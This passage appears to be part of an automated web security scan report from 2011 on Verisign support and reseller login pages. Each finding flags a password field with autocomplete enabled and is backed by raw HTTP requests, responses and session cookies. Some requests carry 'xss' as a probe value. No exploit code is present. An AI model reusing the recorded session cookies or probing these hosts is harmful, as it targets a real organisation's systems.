Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response

11.2. https://knowledge.verisign.ch/support/code-signing-support/index.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://knowledge.verisign.ch
Path:	/support/code-signing-support/index.html

Issue detail

The page contains a form with the following action URL:

https://products.verisign.com/geocenter/reseller/logon.do

The form contains the following password field with autocomplete enabled:

password

Request

GET /support/code-signing-support/index.html HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:43:01 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close

                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<div class="partner_form">
                                   <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post"
                                   id="partner_login" name="logonForm">
                                   <div>
...[SNIP]...
</label>
                                       <input type="password" maxlength="20" size="16" name="password" id="partner_password">
                                   </div>
...[SNIP]...

11.3. https://knowledge.verisign.ch/support/digital-id-support/index.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://knowledge.verisign.ch
Path:	/support/digital-id-support/index.html

Issue detail

The page contains a form with the following action URL:

https://products.verisign.com/geocenter/reseller/logon.do

The form contains the following password field with autocomplete enabled:

password

Request

GET /support/digital-id-support/index.html HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:43:04 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close

                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<div class="partner_form">
                                   <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post"
                                   id="partner_login" name="logonForm">
                                   <div>
...[SNIP]...
</label>
                                       <input type="password" maxlength="20" size="16" name="password" id="partner_password">
                                   </div>
...[SNIP]...

11.4. https://knowledge.verisign.ch/support/mpki-support/index.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://knowledge.verisign.ch
Path:	/support/mpki-support/index.html

Issue detail

The page contains a form with the following action URL:

https://products.verisign.com/geocenter/reseller/logon.do

The form contains the following password field with autocomplete enabled:

password

Request

GET /support/mpki-support/index.html HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:43:13 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close

                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<div class="partner_form">
                                   <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post"
                                   id="partner_login" name="logonForm">
                                   <div>
...[SNIP]...
</label>
                                       <input type="password" maxlength="20" size="16" name="password" id="partner_password">
                                   </div>
...[SNIP]...

11.5. https://knowledge.verisign.ch/support/ssl-certificates-support/index previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://knowledge.verisign.ch
Path:	/support/ssl-certificates-support/index

Issue detail

The page contains a form with the following action URL:

https://products.verisign.com/geocenter/reseller/logon.do

The form contains the following password field with autocomplete enabled:

password

Request

GET /support/ssl-certificates-support/index?page=content&actp=CROSSLINK&id=AR1601 HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:42:33 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close

                                                                                                                                                                                                                                                           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitio
...[SNIP]...
<div class="partner_form">
                                   <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post"
                                   id="partner_login" name="logonForm">
                                   <div>
...[SNIP]...
</label>
                                       <input type="password" maxlength="20" size="16" name="password" id="partner_password">
                                   </div>
...[SNIP]...

11.6. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://knowledge.verisign.ch
Path:	/support/ssl-certificates-support/index.html

Issue detail

The page contains a form with the following action URL:

https://products.verisign.com/geocenter/reseller/logon.do

The form contains the following password field with autocomplete enabled:

password

Request

GET /support/ssl-certificates-support/index.html HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:42:28 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close

                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<div class="partner_form">
                                   <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post"
                                   id="partner_login" name="logonForm">
                                   <div>
...[SNIP]...
</label>
                                       <input type="password" maxlength="20" size="16" name="password" id="partner_password">
                                   </div>
...[SNIP]...

11.7. https://knowledge.verisign.ch/support/trust-seal-support/index.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://knowledge.verisign.ch
Path:	/support/trust-seal-support/index.html

Issue detail

The page contains a form with the following action URL:

https://products.verisign.com/geocenter/reseller/logon.do

The form contains the following password field with autocomplete enabled:

password

Request

GET /support/trust-seal-support/index.html HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:43:01 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close

                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<div class="partner_form">
                                   <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post"
                                   id="partner_login" name="logonForm">
                                   <div>
...[SNIP]...
</label>
                                       <input type="password" maxlength="20" size="16" name="password" id="partner_password">
                                   </div>
...[SNIP]...

11.8. https://knowledge.verisign.com/support/code-signing-support/index previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://knowledge.verisign.com
Path:	/support/code-signing-support/index

Issue detail

The page contains a form with the following action URL:

https://products.verisign.com/geocenter/reseller/logon.do

The form contains the following password field with autocomplete enabled:

password

Request

GET /support/code-signing-support/index?page=content&id=AR185 HTTP/1.1
Host: knowledge.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:44:36 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close

                                                                                                                                                                                                                                                           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitio
...[SNIP]...
<div class="partner_form">
                                   <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post"
                                   id="partner_login" name="logonForm">
                                   <div>
...[SNIP]...
</label>
                                       <input type="password" maxlength="20" size="16" name="password" id="partner_password">
                                   </div>
...[SNIP]...

11.9. https://knowledge.verisign.com/support/code-signing-support/index.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://knowledge.verisign.com
Path:	/support/code-signing-support/index.html

Issue detail

The page contains a form with the following action URL:

https://products.verisign.com/geocenter/reseller/logon.do

The form contains the following password field with autocomplete enabled:

password

Request

GET /support/code-signing-support/index.html HTTP/1.1
Host: knowledge.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:44:18 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close

                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<div class="partner_form">
                                   <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post"
                                   id="partner_login" name="logonForm">
                                   <div>
...[SNIP]...
</label>
                                       <input type="password" maxlength="20" size="16" name="password" id="partner_password">
                                   </div>
...[SNIP]...

11.10. https://knowledge.verisign.com/support/digital-id-support/index.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://knowledge.verisign.com
Path:	/support/digital-id-support/index.html

Issue detail

The page contains a form with the following action URL:

https://products.verisign.com/geocenter/reseller/logon.do

The form contains the following password field with autocomplete enabled:

password

Request

GET /support/digital-id-support/index.html?tid=gnsupport HTTP/1.1
Host: knowledge.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:44:40 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close

                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<div class="partner_form">
                                   <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post"
                                   id="partner_login" name="logonForm">
                                   <div>
...[SNIP]...
</label>
                                       <input type="password" maxlength="20" size="16" name="password" id="partner_password">
                                   </div>
...[SNIP]...

11.11. https://knowledge.verisign.com/support/eca-support/index.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://knowledge.verisign.com
Path:	/support/eca-support/index.html

Issue detail

The page contains a form with the following action URL:

https://products.verisign.com/geocenter/reseller/logon.do

The form contains the following password field with autocomplete enabled:

password

Request

GET /support/eca-support/index.html HTTP/1.1
Host: knowledge.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.12. https://knowledge.verisign.com/support/mpki-for-ssl-support/index previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://knowledge.verisign.com
Path:	/support/mpki-for-ssl-support/index

Issue detail

The page contains a form with the following action URL:

https://products.verisign.com/geocenter/reseller/logon.do

The form contains the following password field with autocomplete enabled:

password

Request

GET /support/mpki-for-ssl-support/index?page=home HTTP/1.1
Host: knowledge.verisign.com
Connection: keep-alive
Referer: https://knowledge.verisign.com/support/mpki-for-ssl-support/index?page=content&id=AR1295&pmv=print&actp=PRINT&viewlocale=fr_FR
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; JSESSIONID=0BA75884D1245C296CF5414E376DC3FC; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:27:51 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Length: 42730

                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<div class="partner_form">
                                   <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post"
                                   id="partner_login" name="logonForm">
                                   <div>
...[SNIP]...
</label>
                                       <input type="password" maxlength="20" size="16" name="password" id="partner_password">
                                   </div>
...[SNIP]...

11.13. https://knowledge.verisign.com/support/mpki-for-ssl-support/index.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://knowledge.verisign.com
Path:	/support/mpki-for-ssl-support/index.html

Issue detail

The page contains a form with the following action URL:

https://products.verisign.com/geocenter/reseller/logon.do

The form contains the following password field with autocomplete enabled:

password

Request

GET /support/mpki-for-ssl-support/index.html HTTP/1.1
Host: knowledge.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:45:43 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close

                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<div class="partner_form">
                                   <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post"
                                   id="partner_login" name="logonForm">
                                   <div>
...[SNIP]...
</label>
                                       <input type="password" maxlength="20" size="16" name="password" id="partner_password">
                                   </div>
...[SNIP]...

11.14. https://knowledge.verisign.com/support/mpki-support/index.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://knowledge.verisign.com
Path:	/support/mpki-support/index.html

Issue detail

The page contains a form with the following action URL:

https://products.verisign.com/geocenter/reseller/logon.do

The form contains the following password field with autocomplete enabled:

password

Request

GET /support/mpki-support/index.html HTTP/1.1
Host: knowledge.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:44:41 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close

                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<div class="partner_form">
                                   <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post"
                                   id="partner_login" name="logonForm">
                                   <div>
...[SNIP]...
</label>
                                       <input type="password" maxlength="20" size="16" name="password" id="partner_password">
                                   </div>
...[SNIP]...

11.15. https://knowledge.verisign.com/support/ssl-certificates-support/index previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://knowledge.verisign.com
Path:	/support/ssl-certificates-support/index

Issue detail

The page contains a form with the following action URL:

https://products.verisign.com/geocenter/reseller/logon.do

The form contains the following password field with autocomplete enabled:

password

Request

GET /support/ssl-certificates-support/index?vproductcat=V_C_S&page=content&id=AR1295&actp=PRINT&viewlocale=fr_FR&impressions=false HTTP/1.1
Host: knowledge.verisign.com
Connection: keep-alive
Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:12 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Length: 46210

                                                                                                                                                                                                                                                           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitio
...[SNIP]...
<div class="partner_form">
                                   <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post"
                                   id="partner_login" name="logonForm">
                                   <div>
...[SNIP]...
</label>
                                       <input type="password" maxlength="20" size="16" name="password" id="partner_password">
                                   </div>
...[SNIP]...

11.16. https://knowledge.verisign.com/support/ssl-certificates-support/index.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://knowledge.verisign.com
Path:	/support/ssl-certificates-support/index.html

Issue detail

The page contains a form with the following action URL:

https://products.verisign.com/geocenter/reseller/logon.do

The form contains the following password field with autocomplete enabled:

password

Request

GET /support/ssl-certificates-support/index.html HTTP/1.1
Host: knowledge.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:43:57 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close

                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<div class="partner_form">
                                   <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post"
                                   id="partner_login" name="logonForm">
                                   <div>
...[SNIP]...
</label>
                                       <input type="password" maxlength="20" size="16" name="password" id="partner_password">
                                   </div>
...[SNIP]...

11.17. https://knowledge.verisign.com/support/trust-seal-support/index.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://knowledge.verisign.com
Path:	/support/trust-seal-support/index.html

Issue detail

The page contains a form with the following action URL:

https://products.verisign.com/geocenter/reseller/logon.do

The form contains the following password field with autocomplete enabled:

password

Request

GET /support/trust-seal-support/index.html HTTP/1.1
Host: knowledge.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.18. https://products.verisign.com/geocenter/reseller/logon.do previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://products.verisign.com
Path:	/geocenter/reseller/logon.do

Issue detail

The page contains a form with the following action URL:

https://products.verisign.com/geocenter/reseller/logon.do

The form contains the following password field with autocomplete enabled:

password

Request

POST /geocenter/reseller/logon.do HTTP/1.1
Host: products.verisign.com
Connection: keep-alive
Referer: https://knowledge.verisign.com/support/ssl-certificates-support/index?vproductcat=V_C_S&page=content&id=AR1295&actp=PRINT&viewlocale=fr_FR&impressions=false
Content-Length: 40
Cache-Control: max-age=0
Origin: https://knowledge.verisign.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1315621455064-973488#1315623565|PC#1315621455064-973488.19#1378693705|check#true#1315621765

userName=xss&password=xss&submit=Sign+In

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:28:02 GMT
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 17164

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>

<link href="/geocenter/style_verisign.css" type=text/css rel="STYLES
...[SNIP]...
<td width="600" valign="top">
<form name="logonForm" method="post" action="/geocenter/reseller/logon.do" accept-charset="UTF-8">
<table>
...[SNIP]...
<td>
<input type="password" name="password" maxlength="20" size="16" value="xss" style="width:130px;">
</td>
...[SNIP]...

11.19. https://products.verisign.com/geocenter/reseller/logon.jsp previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://products.verisign.com
Path:	/geocenter/reseller/logon.jsp

Issue detail

The page contains a form with the following action URL:

https://products.verisign.com/geocenter/reseller/logon.do

The form contains the following password field with autocomplete enabled:

password

Request

GET /geocenter/reseller/logon.jsp HTTP/1.1
Host: products.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 09 Sep 2011 21:46:15 GMT
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 17095

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>

<link href="/geocenter/style_verisign.css" type=text/css rel="STYLES
...[SNIP]...
<td width="600" valign="top">
<form name="logonForm" method="post" action="/geocenter/reseller/logon.do" accept-charset="UTF-8">
<table>
...[SNIP]...
<td>
<input type="password" name="password" maxlength="20" size="16" value="" style="width:130px;">
</td>
...[SNIP]...

11.20. https://products.verisign.com/geocenter/reseller/register.do previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://products.verisign.com
Path:	/geocenter/reseller/register.do

Issue detail

The page contains a form with the following action URL:

https://products.verisign.com/geocenter/reseller/logon.do

The form contains the following password field with autocomplete enabled:

password

Request

GET /geocenter/reseller/register.do?partner=verisignamerica HTTP/1.1
Host: products.verisign.com
Connection: keep-alive
Referer: http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/enrollment/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; JSESSIONID=hhyjTqGBLMJv7h9GbgyHDvJq3QYY5gY8yGM9GyGkjbGQWTH48hf1!1264420788; mbox=session#1315621455064-973488#1315623594|PC#1315621455064-973488.19#1378693734|check#true#1315621794; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.10.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-3-99____

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Fri, 09 Sep 2011 21:28:28 GMT
Pragma: No-cache
Content-Type: text/html;charset=UTF-8
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 17095

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>

<link href="/geocenter/style_verisign.css" type=text/css rel="STYLES
...[SNIP]...
<td width="600" valign="top">
<form name="logonForm" method="post" action="/geocenter/reseller/logon.do" accept-charset="UTF-8">
<table>
...[SNIP]...
<td>
<input type="password" name="password" maxlength="20" size="16" value="" style="width:130px;">
</td>
...[SNIP]...

11.21. http://query.verisign.ch/search previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://query.verisign.ch
Path:	/search

Issue detail

The page contains a form with the following action URL:

https://products.verisign.com/geocenter/reseller/logon.do

The form contains the following password field with autocomplete enabled:

password

Request

GET /search HTTP/1.1
Host: query.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:19 GMT
Server: saws
Cache-Control: private
Content-Type: text/html
Content-Length: 43489
Connection: close

<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html><head>
<meta name="robots" content="NOINDEX,NOFOLLOW">
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7">
<meta http
...[SNIP]...
<div class="partner_form">
                               <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do"
target="_blank">
                                   <div>
...[SNIP]...
</label>
                                       <input type="password"id="partner_password" name="password" size="16" maxlength="20" />
                                   </div>
...[SNIP]...

11.22. http://query.verisign.com/search previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://query.verisign.com
Path:	/search

Issue detail

The page contains a form with the following action URL:

https://test-products.verisign.com/geocenter/reseller/logon.do

The form contains the following password field with autocomplete enabled:

password

Request

GET /search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend HTTP/1.1
Host: query.verisign.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; mbox=check#true#1315621567|session#1315621455064-973488#1315623367|PC#1315621455064-973488.19#1378693507; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

11.23. https://query.verisign.com/search previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://query.verisign.com
Path:	/search

Issue detail

The page contains a form with the following action URL:

https://test-products.verisign.com/geocenter/reseller/logon.do

The form contains the following password field with autocomplete enabled:

password

Request

GET /search HTTP/1.1
Host: query.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:20 GMT
Server: saws
Cache-Control: private
Content-Type: text/html
Content-Length: 44676
Connection: close

<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html><head>
<meta name="robots" content="NOINDEX,NOFOLLOW">
<meta http-equiv="X-UA-Compatible" content="IE=7">
<meta http-equiv="c
...[SNIP]...
<div class="partner_form">
                                           <form name="logonForm" id="partner_login" method="post" action="https://test-products.verisign.com/geocenter/reseller/logon.do"
target="_blank">
                                               <div>
...[SNIP]...
</label>
                                                   <input type="password"id="partner_password" name="password" size="16" maxlength="20" />
                                               </div>
...[SNIP]...

11.24. https://ssl-certificate-center.verisign.ch/process/retail/console_login previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://ssl-certificate-center.verisign.ch
Path:	/process/retail/console_login

Issue detail

The page contains a form with the following action URL:

https://ssl-certificate-center.verisign.ch/process/retail/console_login.do

The form contains the following password field with autocomplete enabled:

enrollment.account.password

Request

GET /process/retail/console_login HTTP/1.1
Host: ssl-certificate-center.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:42 GMT
Server: Apache
